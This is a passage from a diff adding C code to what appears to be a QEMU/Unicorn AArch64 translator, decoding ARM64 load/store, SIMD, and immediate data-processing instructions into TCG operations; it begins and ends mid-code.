false); + } else { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } + } + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size); + if (is_vector) { + if (is_load) { + do_fp_ld(s, rt2, tcg_addr, size); + } else { + do_fp_st(s, rt2, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt2 = cpu_reg(s, rt2); + if (is_load) { + do_gpr_ld(s, tcg_rt2, tcg_addr, size, is_signed, false); + } else { + do_gpr_st(s, tcg_rt2, tcg_addr, size); + } + } + + if (wback) { + if (postindex) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset - (1ULL << size)); + } else { + tcg_gen_subi_i64(tcg_ctx, tcg_addr, tcg_addr, 1ULL << size); + } + tcg_gen_mov_i64(tcg_ctx, cpu_reg_sp(s, rn), tcg_addr); + } +} + +/* + * C3.3.8 Load/store (immediate post-indexed) + * C3.3.9 Load/store (immediate pre-indexed) + * C3.3.12 Load/store (unscaled immediate) + * + * 31 30 29 27 26 25 24 23 22 21 20 12 11 10 9 5 4 0 + * +----+-------+---+-----+-----+---+--------+-----+------+------+ + * |size| 1 1 1 | V | 0 0 | opc | 0 | imm9 | idx | Rn | Rt | + * +----+-------+---+-----+-----+---+--------+-----+------+------+ + * + * idx = 01 -> post-indexed, 11 pre-indexed, 00 unscaled imm. (no writeback) + 10 -> unprivileged + * V = 0 -> non-vector + * size: 00 -> 8 bit, 01 -> 16 bit, 10 -> 32 bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + */ +static void disas_ldst_reg_imm9(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm9 = sextract32(insn, 12, 9); + int opc = extract32(insn, 22, 2); + int size = extract32(insn, 30, 2); + int idx = extract32(insn, 10, 2); + bool is_signed = false; + bool is_store = false; + bool is_extended = false; + bool is_unpriv = (idx == 2); + bool is_vector = extract32(insn, 26, 1); + bool post_index; + bool writeback; + + TCGv_i64 tcg_addr; + + if (is_vector) { + size |= (opc & 2) << 1; + if (size > 4 || is_unpriv) { + unallocated_encoding(s); + return; + } + is_store = ((opc & 1) == 0); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + if (is_unpriv) { + unallocated_encoding(s); + return; + } + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = opc & (1<<1); + is_extended = (size < 3) && (opc & 1); + } + + switch (idx) { + case 0: + case 2: + post_index = false; + writeback = false; + break; + case 1: + post_index = true; + writeback = true; + break; + case 3: + post_index = false; + writeback = true; + break; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + if (!post_index) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, imm9); + } + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + int memidx = is_unpriv ? MMU_USER_IDX : get_mem_index(s); + + if (is_store) { + do_gpr_st_memidx(s, tcg_rt, tcg_addr, size, memidx); + } else { + do_gpr_ld_memidx(s, tcg_rt, tcg_addr, size, + is_signed, is_extended, memidx); + } + } + + if (writeback) { + TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); + if (post_index) { + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, imm9); + } + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } +} + +/* + * C3.3.10 Load/store (register offset) + * + * 31 30 29 27 26 25 24 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ + * |size| 1 1 1 | V | 0 0 | opc | 1 | Rm | opt | S| 1 0 | Rn | Rt | + * +----+-------+---+-----+-----+---+------+-----+--+-----+----+----+ + * + * For non-vector: + * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + * For vector: + * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated + * opc<0>: 0 -> store, 1 -> load + * V: 1 -> vector/simd + * opt: extend encoding (see DecodeRegExtend) + * S: if S=1 then scale (essentially index by sizeof(size)) + * Rt: register to transfer into/out of + * Rn: address register or SP for base + * Rm: offset register or ZR for offset + */ +static void disas_ldst_reg_roffset(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int shift = extract32(insn, 12, 1); + int rm = extract32(insn, 16, 5); + int opc = extract32(insn, 22, 2); + int opt = extract32(insn, 13, 3); + int size = extract32(insn, 30, 2); + bool is_signed = false; + bool is_store = false; + bool is_extended = false; + bool is_vector = extract32(insn, 26, 1); + + TCGv_i64 tcg_rm; + TCGv_i64 tcg_addr; + + if (extract32(opt, 1, 1) == 0) { + unallocated_encoding(s); + return; + } + + if (is_vector) { + size |= (opc & 2) << 1; + if (size > 4) { + unallocated_encoding(s); + return; + } + is_store = !extract32(opc, 0, 1); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = extract32(opc, 1, 1); + is_extended = (size < 3) && extract32(opc, 0, 1); + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + + tcg_rm = read_cpu_reg(s, rm, 1); + ext_and_shift_reg(tcg_ctx, tcg_rm, tcg_rm, opt, shift ? size : 0); + + tcg_gen_add_i64(tcg_ctx, tcg_addr, tcg_addr, tcg_rm); + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, is_extended); + } + } +} + +/* + * C3.3.13 Load/store (unsigned immediate) + * + * 31 30 29 27 26 25 24 23 22 21 10 9 5 + * +----+-------+---+-----+-----+------------+-------+------+ + * |size| 1 1 1 | V | 0 1 | opc | imm12 | Rn | Rt | + * +----+-------+---+-----+-----+------------+-------+------+ + * + * For non-vector: + * size: 00-> byte, 01 -> 16 bit, 10 -> 32bit, 11 -> 64bit + * opc: 00 -> store, 01 -> loadu, 10 -> loads 64, 11 -> loads 32 + * For vector: + * size is opc<1>:size<1:0> so 100 -> 128 bit; 110 and 111 unallocated + * opc<0>: 0 -> store, 1 -> load + * Rn: base address register (inc SP) + * Rt: target register + */ +static void disas_ldst_reg_unsigned_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + unsigned int imm12 = extract32(insn, 10, 12); + bool is_vector = extract32(insn, 26, 1); + int size = extract32(insn, 30, 2); + int opc = extract32(insn, 22, 2); + unsigned int offset; + + TCGv_i64 tcg_addr; + + bool is_store; + bool is_signed = false; + bool is_extended = false; + + if (is_vector) { + size |= (opc & 2) << 1; + if (size > 4) { + unallocated_encoding(s); + return; + } + is_store = !extract32(opc, 0, 1); + if (!fp_access_check(s)) { + return; + } + } else { + if (size == 3 && opc == 2) { + /* PRFM - prefetch */ + return; + } + if (opc == 3 && size > 1) { + unallocated_encoding(s); + return; + } + is_store = (opc == 0); + is_signed = extract32(opc, 1, 1); + is_extended = (size < 3) && extract32(opc, 0, 1); + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + tcg_addr = read_cpu_reg_sp(s, rn, 1); + offset = imm12 << size; + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, offset); + + if (is_vector) { + if (is_store) { + do_fp_st(s, rt, tcg_addr, size); + } else { + do_fp_ld(s, rt, tcg_addr, size); + } + } else { + TCGv_i64 tcg_rt = cpu_reg(s, rt); + if (is_store) { + do_gpr_st(s, tcg_rt, tcg_addr, size); + } else { + do_gpr_ld(s, tcg_rt, tcg_addr, size, is_signed, is_extended); + } + } +} + +/* Load/store register (all forms) */ +static void disas_ldst_reg(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 2)) { + case 0: + if (extract32(insn, 21, 1) == 1 && extract32(insn, 10, 2) == 2) { + disas_ldst_reg_roffset(s, insn); + } else { + /* Load/store register (unscaled immediate) + * Load/store immediate pre/post-indexed + * Load/store register unprivileged + */ + disas_ldst_reg_imm9(s, insn); + } + break; + case 1: + disas_ldst_reg_unsigned_imm(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.3.1 AdvSIMD load/store multiple structures + * + * 31 30 29 23 22 21 16 15 12 11 10 9 5 4 0 + * +---+---+---------------+---+-------------+--------+------+------+------+ + * | 0 | Q | 0 0 1 1 0 0 0 | L | 0 0 0 0 0 0 | opcode | size | Rn | Rt | + * +---+---+---------------+---+-------------+--------+------+------+------+ + * + * C3.3.2 AdvSIMD load/store multiple structures (post-indexed) + * + * 31 30 29 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---------------+---+---+---------+--------+------+------+------+ + * | 0 | Q | 0 0 1 1 0 0 1 | L | 0 | Rm | opcode | size | Rn | Rt | + * +---+---+---------------+---+---+---------+--------+------+------+------+ + * + * Rt: first (or only) SIMD&FP register to be transferred + * Rn: base address or SP + * Rm (post-index only): post-index register (when !31) or size dependent #imm + */ +static void disas_ldst_multiple_struct(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = extract32(insn, 10, 2); + int opcode = extract32(insn, 12, 4); + bool is_store = !extract32(insn, 22, 1); + bool is_postidx = extract32(insn, 23, 1); + bool is_q = extract32(insn, 30, 1); + TCGv_i64 tcg_addr, tcg_rn; + + int ebytes = 1 << size; + int elements = (is_q ? 128 : 64) / (8 << size); + int rpt; /* num iterations */ + int selem; /* structure elements */ + int r; + + if (extract32(insn, 31, 1) || extract32(insn, 21, 1)) { + unallocated_encoding(s); + return; + } + + /* From the shared decode logic */ + switch (opcode) { + case 0x0: + rpt = 1; + selem = 4; + break; + case 0x2: + rpt = 4; + selem = 1; + break; + case 0x4: + rpt = 1; + selem = 3; + break; + case 0x6: + rpt = 3; + selem = 1; + break; + case 0x7: + rpt = 1; + selem = 1; + break; + case 0x8: + rpt = 1; + selem = 2; + break; + case 0xa: + rpt = 2; + selem = 1; + break; + default: + unallocated_encoding(s); + return; + } + + if (size == 3 && !is_q && selem != 1) { + /* reserved */ + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + if (rn == 31) { + gen_check_sp_alignment(s); + } + + tcg_rn = cpu_reg_sp(s, rn); + tcg_addr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_mov_i64(tcg_ctx, tcg_addr, tcg_rn); + + for (r = 0; r < rpt; r++) { + int e; + for (e = 0; e < elements; e++) { + int tt = (rt + r) % 32; + int xs; + for (xs = 0; xs < selem; xs++) { + if (is_store) { + do_vec_st(s, tt, e, tcg_addr, size); + } else { + do_vec_ld(s, tt, e, tcg_addr, size); + + /* For non-quad operations, setting a slice of the low + * 64 bits of the register clears the high 64 bits (in + * the ARM ARM pseudocode this is implicit in the fact + * that 'rval' is a 64 bit wide variable). We optimize + * by noticing that we only need to do this the first + * time we touch a register. + */ + if (!is_q && e == 0 && (r == 0 || xs == selem - 1)) { + clear_vec_high(s, tt); + } + } + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, ebytes); + tt = (tt + 1) % 32; + } + } + } + + if (is_postidx) { + int rm = extract32(insn, 16, 5); + if (rm == 31) { + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* C3.3.3 AdvSIMD load/store single structure + * + * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * | 0 | Q | 0 0 1 1 0 1 0 | L R | 0 0 0 0 0 | opc | S | size | Rn | Rt | + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * + * C3.3.4 AdvSIMD load/store single structure (post-indexed) + * + * 31 30 29 23 22 21 20 16 15 13 12 11 10 9 5 4 0 + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * | 0 | Q | 0 0 1 1 0 1 1 | L R | Rm | opc | S | size | Rn | Rt | + * +---+---+---------------+-----+-----------+-----+---+------+------+------+ + * + * Rt: first (or only) SIMD&FP register to be transferred + * Rn: base address or SP + * Rm (post-index only): post-index register (when !31) or size dependent #imm + * index = encoded in Q:S:size dependent on size + * + * lane_size = encoded in R, opc + * transfer width = encoded in opc, S, size + */ +static void disas_ldst_single_struct(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rt = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int size = extract32(insn, 10, 2); + int S = extract32(insn, 12, 1); + int opc = extract32(insn, 13, 3); + int R = extract32(insn, 21, 1); + int is_load = extract32(insn, 22, 1); + int is_postidx = extract32(insn, 23, 1); + int is_q = extract32(insn, 30, 1); + + int scale = extract32(opc, 1, 2); + int selem = (extract32(opc, 0, 1) << 1 | R) + 1; + bool replicate = false; + int index = is_q << 3 | S << 2 | size; + int ebytes, xs; + TCGv_i64 tcg_addr, tcg_rn; + + switch (scale) { + case 3: + if (!is_load || S) { + unallocated_encoding(s); + return; + } + scale = size; + replicate = true; + break; + case 0: + break; + case 1: + if (extract32(size, 0, 1)) { + unallocated_encoding(s); + return; + } + index >>= 1; + break; + case 2: + if (extract32(size, 1, 1)) { + unallocated_encoding(s); + return; + } + if (!extract32(size, 0, 1)) { + index >>= 2; + } else { + if (S) { + unallocated_encoding(s); + return; + } + index >>= 3; + scale = 3; + } + break; + default: + g_assert_not_reached(); + } + + if (!fp_access_check(s)) { + return; + } + + ebytes = 1 << scale; + + if (rn == 31) { + gen_check_sp_alignment(s); + } + + tcg_rn = cpu_reg_sp(s, rn); + tcg_addr = tcg_temp_new_i64(tcg_ctx); + tcg_gen_mov_i64(tcg_ctx, tcg_addr, tcg_rn); + + for (xs = 0; xs < selem; xs++) { + if (replicate) { + /* Load and replicate to all elements */ + uint64_t mulconst; + TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(s->uc, tcg_tmp, tcg_addr, + get_mem_index(s), MO_TE + scale); + switch (scale) { + case 0: + mulconst = 0x0101010101010101ULL; + break; + case 1: + mulconst = 0x0001000100010001ULL; + break; + case 2: + mulconst = 0x0000000100000001ULL; + break; + case 3: + mulconst = 0; + break; + default: + g_assert_not_reached(); + } + if (mulconst) { + tcg_gen_muli_i64(tcg_ctx, tcg_tmp, tcg_tmp, mulconst); + } + write_vec_element(s, tcg_tmp, rt, 0, MO_64); + if (is_q) { + write_vec_element(s, tcg_tmp, rt, 1, MO_64); + } else { + clear_vec_high(s, rt); + } + tcg_temp_free_i64(tcg_ctx, tcg_tmp); + } else { + /* Load/store one element per register */ + if (is_load) { + do_vec_ld(s, rt, index, tcg_addr, MO_TE + scale); + } else { + do_vec_st(s, rt, index, tcg_addr, MO_TE + scale); + } + } + tcg_gen_addi_i64(tcg_ctx, tcg_addr, tcg_addr, ebytes); + rt = (rt + 1) % 32; + } + + if (is_postidx) { + int rm = extract32(insn, 16, 5); + if (rm == 31) { + tcg_gen_mov_i64(tcg_ctx, tcg_rn, tcg_addr); + } else { + tcg_gen_add_i64(tcg_ctx, tcg_rn, tcg_rn, cpu_reg(s, rm)); + } + } + tcg_temp_free_i64(tcg_ctx, tcg_addr); +} + +/* C3.3 Loads and stores */ +static void disas_ldst(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 24, 6)) { + case 0x08: /* Load/store exclusive */ + disas_ldst_excl(s, insn); + break; + case 0x18: case 0x1c: /* Load register (literal) */ + disas_ld_lit(s, insn); + break; + case 0x28: case 0x29: + case 0x2c: case 0x2d: /* Load/store pair (all forms) */ + disas_ldst_pair(s, insn); + break; + case 0x38: case 0x39: + case 0x3c: case 0x3d: /* Load/store register (all forms) */ + disas_ldst_reg(s, insn); + break; + case 0x0c: /* AdvSIMD load/store multiple structures */ + disas_ldst_multiple_struct(s, insn); + break; + case 0x0d: /* AdvSIMD load/store single structure */ + disas_ldst_single_struct(s, insn); + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.4.6 PC-rel. addressing + * 31 30 29 28 24 23 5 4 0 + * +----+-------+-----------+-------------------+------+ + * | op | immlo | 1 0 0 0 0 | immhi | Rd | + * +----+-------+-----------+-------------------+------+ + */ +static void disas_pc_rel_adr(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int page, rd; + uint64_t base; + int64_t offset; + + page = extract32(insn, 31, 1); + /* SignExtend(immhi:immlo) -> offset */ + offset = (int64_t)((uint64_t)sextract32(insn, 5, 19) << 2) | extract32(insn, 29, 2); + rd = extract32(insn, 0, 5); + base = s->pc - 4; + + if (page) { + /* ADRP (page based) */ + base &= ~0xfff; + offset = ((uint64_t)offset) << 12; + } + + tcg_gen_movi_i64(tcg_ctx, cpu_reg(s, rd), base + offset); +} + +/* + * C3.4.1 Add/subtract (immediate) + * + * 31 30 29 28 24 23 22 21 10 9 5 4 0 + * +--+--+--+-----------+-----+-------------+-----+-----+ + * |sf|op| S| 1 0 0 0 1 |shift| imm12 | Rn | Rd | + * +--+--+--+-----------+-----+-------------+-----+-----+ + * + * sf: 0 -> 32bit, 1 -> 64bit + * op: 0 -> add , 1 -> sub + * S: 1 -> set flags + * shift: 00 -> LSL imm by 0, 01 -> LSL imm by 12 + */ +static void disas_add_sub_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + uint64_t imm = extract32(insn, 10, 12); + int shift = extract32(insn, 22, 2); + bool setflags = extract32(insn, 29, 1); + bool sub_op = extract32(insn, 30, 1); + bool is_64bit = extract32(insn, 31, 1); + + TCGv_i64 tcg_rn = cpu_reg_sp(s, rn); + TCGv_i64 tcg_rd = setflags ? cpu_reg(s, rd) : cpu_reg_sp(s, rd); + TCGv_i64 tcg_result; + + switch (shift) { + case 0x0: + break; + case 0x1: + imm <<= 12; + break; + default: + unallocated_encoding(s); + return; + } + + tcg_result = tcg_temp_new_i64(tcg_ctx); + if (!setflags) { + if (sub_op) { + tcg_gen_subi_i64(tcg_ctx, tcg_result, tcg_rn, imm); + } else { + tcg_gen_addi_i64(tcg_ctx, tcg_result, tcg_rn, imm); + } + } else { + TCGv_i64 tcg_imm = tcg_const_i64(tcg_ctx, imm); + if (sub_op) { + gen_sub_CC(s, is_64bit, tcg_result, tcg_rn, tcg_imm); + } else { + gen_add_CC(s, is_64bit, tcg_result, tcg_rn, tcg_imm); + } + tcg_temp_free_i64(tcg_ctx, tcg_imm); + } + + if (is_64bit) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_result); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_result); + } + + tcg_temp_free_i64(tcg_ctx, tcg_result); +} + +/* The input should be a value in the bottom e bits (with higher + * bits zero); returns that value replicated into every element + * of size e in a 64 bit integer. + */ +static uint64_t bitfield_replicate(uint64_t mask, unsigned int e) +{ + assert(e != 0); + while (e < 64) { + mask |= mask << e; + e *= 2; + } + return mask; +} + +/* Return a value with the bottom len bits set (where 0 < len <= 64) */ +static inline uint64_t bitmask64(unsigned int length) +{ + assert(length > 0 && length <= 64); + return ~0ULL >> (64 - length); +} + +/* Simplified variant of pseudocode DecodeBitMasks() for the case where we + * only require the wmask. Returns false if the imms/immr/immn are a reserved + * value (ie should cause a guest UNDEF exception), and true if they are + * valid, in which case the decoded bit pattern is written to result. + */ +static bool logic_imm_decode_wmask(uint64_t *result, unsigned int immn, + unsigned int imms, unsigned int immr) +{ + uint64_t mask; + unsigned e, levels, s, r; + int len; + + assert(immn < 2 && imms < 64 && immr < 64); + + /* The bit patterns we create here are 64 bit patterns which + * are vectors of identical elements of size e = 2, 4, 8, 16, 32 or + * 64 bits each. Each element contains the same value: a run + * of between 1 and e-1 non-zero bits, rotated within the + * element by between 0 and e-1 bits. + * + * The element size and run length are encoded into immn (1 bit) + * and imms (6 bits) as follows: + * 64 bit elements: immn = 1, imms = + * 32 bit elements: immn = 0, imms = 0 : + * 16 bit elements: immn = 0, imms = 10 : + * 8 bit elements: immn = 0, imms = 110 : + * 4 bit elements: immn = 0, imms = 1110 : + * 2 bit elements: immn = 0, imms = 11110 : + * Notice that immn = 0, imms = 11111x is the only combination + * not covered by one of the above options; this is reserved. + * Further, all-ones is a reserved pattern. + * + * In all cases the rotation is by immr % e (and immr is 6 bits). + */ + + /* First determine the element size */ + len = 31 - clz32((immn << 6) | (~imms & 0x3f)); + if (len < 1) { + /* This is the immn == 0, imms == 0x11111x case */ + return false; + } + e = 1 << len; + + levels = e - 1; + s = imms & levels; + r = immr & levels; + + if (s == levels) { + /* mustn't be all-ones. */ + return false; + } + + /* Create the value of one element: s+1 set bits rotated + * by r within the element (which is e bits wide)... + */ + mask = bitmask64(s + 1); + mask = (mask >> r) | (mask << ((e - r) & 0x3f) ); + /* ...then replicate the element over the whole 64 bit value */ + mask = bitfield_replicate(mask, e); + *result = mask; + return true; +} + +/* C3.4.4 Logical (immediate) + * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 + * +----+-----+-------------+---+------+------+------+------+ + * | sf | opc | 1 0 0 1 0 0 | N | immr | imms | Rn | Rd | + * +----+-----+-------------+---+------+------+------+------+ + */ +static void disas_logic_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, opc, is_n, immr, imms, rn, rd; + TCGv_i64 tcg_rd, tcg_rn; + uint64_t wmask; + bool is_and = false; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + is_n = extract32(insn, 22, 1); + immr = extract32(insn, 16, 6); + imms = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + + if (!sf && is_n) { + unallocated_encoding(s); + return; + } + + if (opc == 0x3) { /* ANDS */ + tcg_rd = cpu_reg(s, rd); + } else { + tcg_rd = cpu_reg_sp(s, rd); + } + tcg_rn = cpu_reg(s, rn); + + if (!logic_imm_decode_wmask(&wmask, is_n, imms, immr)) { + /* some immediate field values are reserved */ + unallocated_encoding(s); + return; + } + + if (!sf) { + wmask &= 0xffffffff; + } + + switch (opc) { + case 0x3: /* ANDS */ + case 0x0: /* AND */ + tcg_gen_andi_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + is_and = true; + break; + case 0x1: /* ORR */ + tcg_gen_ori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + break; + case 0x2: /* EOR */ + tcg_gen_xori_i64(tcg_ctx, tcg_rd, tcg_rn, wmask); + break; + default: + assert(FALSE); /* must handle all above */ + break; + } + + if (!sf && !is_and) { + /* zero extend final result; we know we can skip this for AND + * since the immediate had the high 32 bits clear. + */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + + if (opc == 3) { /* ANDS */ + gen_logic_CC(tcg_ctx, sf, tcg_rd); + } +} + +/* + * C3.4.5 Move wide (immediate) + * + * 31 30 29 28 23 22 21 20 5 4 0 + * +--+-----+-------------+-----+----------------+------+ + * |sf| opc | 1 0 0 1 0 1 | hw | imm16 | Rd | + * +--+-----+-------------+-----+----------------+------+ + * + * sf: 0 -> 32 bit, 1 -> 64 bit + * opc: 00 -> N, 10 -> Z, 11 -> K + * hw: shift/16 (0,16, and sf only 32, 48) + */ +static void disas_movw_imm(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + uint64_t imm = extract32(insn, 5, 16); + int sf = extract32(insn, 31, 1); + int opc = extract32(insn, 29, 2); + int pos = extract32(insn, 21, 2) << 4; + TCGv_i64 tcg_rd = cpu_reg(s, rd); + TCGv_i64 tcg_imm; + + if (!sf && (pos >= 32)) { + unallocated_encoding(s); + return; + } + + switch (opc) { + case 0: /* MOVN */ + case 2: /* MOVZ */ + imm <<= pos; + if (opc == 0) { + imm = ~imm; + } + if (!sf) { + imm &= 0xffffffffu; + } + tcg_gen_movi_i64(tcg_ctx, tcg_rd, imm); + break; + case 3: /* MOVK */ + tcg_imm = tcg_const_i64(tcg_ctx, imm); + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm, pos, 16); + tcg_temp_free_i64(tcg_ctx, tcg_imm); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + break; + default: + unallocated_encoding(s); + break; + } +} + +/* C3.4.2 Bitfield + * 31 30 29 28 23 22 21 16 15 10 9 5 4 0 + * +----+-----+-------------+---+------+------+------+------+ + * | sf | opc | 1 0 0 1 1 0 | N | immr | imms | Rn | Rd | + * +----+-----+-------------+---+------+------+------+------+ + */ +static void disas_bitfield(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, n, opc, ri, si, rn, rd, bitsize, pos, len; + TCGv_i64 tcg_rd, tcg_tmp; + + sf = extract32(insn, 31, 1); + opc = extract32(insn, 29, 2); + n = extract32(insn, 22, 1); + ri = extract32(insn, 16, 6); + si = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + bitsize = sf ? 64 : 32; + + if (sf != n || ri >= bitsize || si >= bitsize || opc > 2) { + unallocated_encoding(s); + return; + } + + tcg_rd = cpu_reg(s, rd); + tcg_tmp = read_cpu_reg(s, rn, sf); + + /* OPTME: probably worth recognizing common cases of ext{8,16,32}{u,s} */ + + if (opc != 1) { /* SBFM or UBFM */ + tcg_gen_movi_i64(tcg_ctx, tcg_rd, 0); + } + + /* do the bit move operation */ + if (si >= ri) { + /* Wd = Wn */ + tcg_gen_shri_i64(tcg_ctx, tcg_tmp, tcg_tmp, ri); + pos = 0; + len = (si - ri) + 1; + } else { + /* Wd<32+s-r,32-r> = Wn */ + pos = bitsize - ri; + len = si + 1; + } + + tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_tmp, pos, len); + + if (opc == 0) { /* SBFM - sign extend the destination field */ + tcg_gen_shli_i64(tcg_ctx, tcg_rd, tcg_rd, 64 - (pos + len)); + tcg_gen_sari_i64(tcg_ctx, tcg_rd, tcg_rd, 64 - (pos + len)); + } + + if (!sf) { /* zero extend final result */ + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C3.4.3 Extract + * 31 30 29 28 23 22 21 20 16 15 10 9 5 4 0 + * +----+------+-------------+---+----+------+--------+------+------+ + * | sf | op21 | 1 0 0 1 1 1 | N | o0 | Rm | imms | Rn | Rd | + * +----+------+-------------+---+----+------+--------+------+------+ + */ +static void disas_extract(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + unsigned int sf, n, rm, imm, rn, rd, bitsize, op21, op0; + + sf = extract32(insn, 31, 1); + n = extract32(insn, 22, 1); + rm = extract32(insn, 16, 5); + imm = extract32(insn, 10, 6); + rn = extract32(insn, 5, 5); + rd = extract32(insn, 0, 5); + op21 = extract32(insn, 29, 2); + op0 = extract32(insn, 21, 1); + bitsize = sf ? 64 : 32; + + if (sf != n || op21 || op0 || imm >= bitsize) { + unallocated_encoding(s); + } else { + TCGv_i64 tcg_rd, tcg_rm, tcg_rn; + + tcg_rd = cpu_reg(s, rd); + + if (imm) { + /* OPTME: we can special case rm==rn as a rotate */ + tcg_rm = read_cpu_reg(s, rm, sf); + tcg_rn = read_cpu_reg(s, rn, sf); + tcg_gen_shri_i64(tcg_ctx, tcg_rm, tcg_rm, imm); + tcg_gen_shli_i64(tcg_ctx, tcg_rn, tcg_rn, bitsize - imm); + tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rm, tcg_rn); + if (!sf) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } + } else { + /* tcg shl_i32/shl_i64 is undefined for 32/64 bit shifts, + * so an extract from bit 0 is a special case. + */ + if (sf) { + tcg_gen_mov_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); + } else { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, cpu_reg(s, rm)); + } + } + + } +} + +/* C3.4 Data processing - immediate */ +static void disas_data_proc_imm(DisasContext *s, uint32_t insn) +{ + switch (extract32(insn, 23, 6)) { + case 0x20: case 0x21: /* PC-rel. addressing */ + disas_pc_rel_adr(s, insn); + break; + case 0x22: case 0x23: /* Add/subtract (immediate) */ + disas_add_sub_imm(s, insn); + break; + case 0x24: /* Logical (immediate) */ + disas_logic_imm(s, insn); + break; + case 0x25: /* Move wide (immediate) */ + disas_movw_imm(s, insn); + break; + case 0x26: /* Bitfield */ + disas_bitfield(s, insn); + break; + case 0x27: 